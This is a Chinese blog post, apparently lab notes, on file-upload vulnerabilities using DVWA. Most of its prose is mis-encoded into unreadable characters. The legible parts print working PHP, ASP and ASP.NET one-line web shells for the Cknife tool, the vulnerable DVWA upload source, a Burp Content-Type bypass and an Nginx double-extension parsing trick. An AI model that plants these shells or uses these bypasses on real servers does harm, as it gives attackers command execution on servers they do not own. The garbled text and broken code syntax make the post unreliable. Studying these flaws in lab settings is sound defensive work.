闊╄垝瀛﹀锛堢浉褰撴俯鏌旓級浠婂ぉ缁欐垜浠瑙d簡鏂囦欢涓婁紶婕忔礊锛屼互鍙夾nrwsord鍜孋knife绛夊伐鍏风殑浣跨敤銆?/p>
鏂囦欢涓婁紶婕忔礊
涓婁紶鐨勬枃浠朵笉杩涜闄愬埗锛屾湁鍙兘浼氳鍒╃敤浜庝笂浼犲彲鎵ц鏂囦欢銆佽剼鏈埌鏈嶅姟鍣ㄤ笂锛屽苟涓旈€氳繃鑴氭湰鏂囦欢鍙互鑾峰緱鎵ц鏈嶅姟鍣ㄧ鍛戒护鐨勮兘鍔?/p>
鏈ㄩ┈
鏍规嵁璇█鍒嗙被锛屾湁php銆丄SP銆丣SP銆丄SP.NET绛変笉鍚岃瑷€涓嬬殑鏈ㄩ┈锛涙牴鎹綔鐢ㄥ垎绫伙紝鏈夊ぇ椹拰灏忛┈
PHP涓€鍙ヨ瘽鏈ㄩ┈锛?/p>
<?php ehco shell_exec($_GET[鈥榓鈥橾); ?>
<?php ehco shell_exec($_POST[鈥榓鈥橾); ?>
<?php @eval($_POST[鈥榓鈥橾); ?>
ASP涓€鍙ヨ瘽鏈ㄩ┈锛?/p>
<%eval request(鈥淐knife鈥?%>
ASP.NET涓€鍙ヨ瘽鏈ㄩ┈锛?/p>
<%@ Page Language=鈥滼script鈥?><%eval(Request.Item[鈥淐knife鈥漖,鈥漸nsafe鈥?;%>
shell_exec()
閫氳繃鐜鎵ц鍛戒护锛屽苟涓斿皢瀹屾暣鐨勮緭鍑轰互瀛楃涓茬殑鏂瑰紡杩斿洖
eval()
鎶婂瓧绗︿覆浣滀负PHP浠g爜鎵ц鎵цa鎺ユ敹鍒扮殑鍐呭
DVWA鈥檚 File Upload
low level鐨勬祴璇曚竴涓嬶紝婧愮爜涓病鏈夊浠讳綍鏂囦欢鏍煎紡杩涜杩囨护锛?/p>
鍐欏嚭涓€鍙ヨ瘽鏈ㄩ┈
鐢ㄨ彍鍒€杩炴帴鐨勪竴鍙ヨ瘽鏈ㄩ┈锛?/p>
<?php @eval($_POST[鈥榓鈥橾; ?>
鐩存帴鍦ㄧ綉椤典笅閫氳繃GET鐨勪竴鍙ヨ瘽鏈ㄩ┈锛?/p>
<?php echo shell_exec($_GET[鈥榓鈥橾); ?>
鍦ㄧ綉椤典笅鐢╤ackbar閫氳繃POST鐨勪竴鍙ヨ瘽鏈ㄩ┈锛?/p>
<?php echo shell_exec($_POST[鈥榓鈥橾); ?>
getpost
Cknife杩炴帴
杩炴帴鍚庡彲浠ュ緱鍒扮洰鏍囨湇鍔″櫒涓嬫墍鏈夋枃浠?/p>
婧愮爜锛?/p>
<?php
if (isset($_POST[鈥楿pload鈥橾)) {
$target_path =
DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
//涓婁紶璺緞涓?./../hackable/uploads/
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
//涓婁紶璺緞鍔犱笂涓婁紶鐨勬枃浠跺悕
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
//瀵规槸鍚︿笂浼犳垚鍔熷仛鍑哄垽鏂紝鍥犳鎵€鏈夋牸寮忕殑鏂囦欢閮借兘涓婁紶
echo '<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
?>
鏈嶅姟绔娴嬬粫杩囷紙MIME绫诲瀷妫€娴嬶級
閫氳繃鍒ゆ柇$_FILES[鈥榰serfile鈥橾[鈥榯ype鈥橾!=鈥漣mgae/gif鈥濇潵淇濊瘉涓婁紶鐨勬枃浠剁被鍨嬩负gif
缁曡繃锛氶€氳繃burp鎶撳寘锛屽皢鍘熸潵鐨凜ontent-Type绫诲瀷鏀逛负绗﹀悎瑕佹眰鐨勭被鍨?/p>
Content-Type: application/octet-stream
application/octet-stream鍗充负php鏂囦欢鐨勬枃浠剁被鍨嬫牸寮?/p>
html鈥濊В鏋愪负asp绫诲瀷
锛?锛塏ginx瑙f瀽婕忔礊锛氬皢php鏂囦欢鎹㈡垚鍏朵粬鍙互閫氳繃鐨勬枃浠跺悗缂€锛岃闂殑鏃跺€欏湪鍚庨潰鍔犱笂鈥渆val.php.jpg鈥濓紝濡傗€渆vil.jpg/.php鈥濓紝鈥渆vil.jpg鈥濅細瑙f瀽涓簆hp鐨勬牸寮?/p>
澶т笓鏍?/a> 闆嗚绗叚澶╋細鏂囦欢涓婁紶婕忔礊
以上是关于闆嗚绗叚澶╋細鏂囦欢涓婁紶婕忔礊的主要内容,如果未能解决你的问题,请参考以下文章